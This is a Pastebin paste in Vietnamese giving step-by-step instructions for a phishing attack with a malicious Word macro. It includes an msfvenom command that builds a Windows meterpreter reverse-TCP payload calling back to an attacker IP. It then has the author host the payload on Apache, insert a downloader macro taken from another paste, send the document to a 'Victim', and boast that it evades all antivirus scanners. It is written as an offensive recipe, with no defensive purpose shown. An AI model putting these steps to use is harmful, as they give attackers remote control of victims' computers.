SHARE
TWEET

Untitled

anhkiet2507 Dec 18th, 2016 9,947 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. Chuẩn bị
 2. - 1 máy Kali để tạo file mã độc
 3. B1: Code tạo mã độc:
 4. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f exe -o /root/Desktop/payload.exe
 5. Thay LHOST bằng IP máy Kali
 6. B2: Copy vào đường dẫn /root/var/www/html và điều chỉnh lại một số quyền như mình làm
 7. Chạy apache2 lên bằng cách gõ lệnh service apache2 start
 8.  
 9. - 1 máy Windows để đóng gói file mã độc. Cần cài đặt Microsoft Office-Ở đây tôi xài Office 2013
 10. B1: Truy cập vào trang http://pastebin.com/raw/96cHWsNg copy và Paste vào Notepad
 11. Thay đoạn otqBShpqzXRvxekDL = "http://IP máy Kali/payload.exe"
 12. Ví dụ: otqBShpqzXRvxekDL = "http://192.168.1.6/payload.exe"
 13. B2: Mở 1 file Word lên gõ 1 vài từ vào đó rồi bôi đen View-> Macro và làm theo mình
 14. B3: Gửi file Word đó cho Victim
 15. B4: Khi Victim mở ra-> Great
 16. FUD: 55/55 (100%)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top